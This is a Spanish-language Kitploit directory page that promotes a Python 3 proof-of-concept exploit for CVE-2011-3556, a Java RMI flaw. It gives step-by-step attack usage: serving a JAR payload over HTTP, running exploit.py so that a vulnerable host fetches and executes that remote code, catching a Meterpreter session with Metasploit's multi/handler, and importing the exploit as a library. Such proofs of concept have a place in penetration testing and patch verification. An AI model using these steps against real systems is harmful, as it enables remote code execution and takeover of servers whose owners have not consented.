Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve_2011_3556 — Implementación en Python 3 de una prueba de concepto (PoC) existente del CVE-2011-3556. | Kitploit
Herramientas/GitHubGitHub/sk4la/cve_2011_3556
Frameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsk4la/cve_2011_3556

cve_2011_3556

Implementación en Python 3 de una prueba de concepto (PoC) existente del CVE-2011-3556.

Ver Repositorio
1hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2011-3556 — Prueba de concepto (PoC)

Descargo de responsabilidad

Esta herramienta es una implementación en Python 3 de una prueba de concepto (PoC) existente, creada por mihi para Metasploit Framework.

Requisitos previos

Para usar el módulo, simplemente sigue las instrucciones que se indican a continuación:

root@kitploit:~
# Clone this repository locally.
$ git clone https://github.com/sk4la/cve_2011_3556.git && cd cve_2011_3556/

# Optionally set the `x` bit to be able to execute the script directly.
$ chmod u+x exploit.py

$ ./exploit.py --help && echo "It works!"

Uso

Línea de comandos

Para que el servidor Java RMI vulnerable lo cargue de forma remota, el payload (un binario JAR) debe servirse como recurso HTTP. Se puede servir rápidamente con el conocido python3 -m http.server.

Una vez que el payload esté disponible para su descarga, simplemente ejecuta el script exploit.py para desencadenar la vulnerabilidad.

root@kitploit:~
$ python3 -m http.server --bind DELIVERY_HOST DELIVERY_PORT &
$ ./exploit.py -h VULNERABLE_HOST -u http://DELIVERY_HOST:DELIVERY_PORT/PAYLOAD.jar`

En caso de que el payload sea un Meterpreter (Metasploit Framework), no olvides usar use exploit/multi/handler.

Biblioteca

Este módulo también se puede usar como biblioteca importando el módulo cve_2011_3556 en tu espacio de nombres actual:

root@kitploit:~
from cve_2011_3556 import JavaRMIExploit

JavaRMIExploit("127.0.0.1", "http://127.0.0.1/payload.jar").exploit()

¡Así de simple!

Créditos

Agradecimientos especiales a mihi por la implementación inicial del módulo de Metasploit Framework.

Descargar herramienta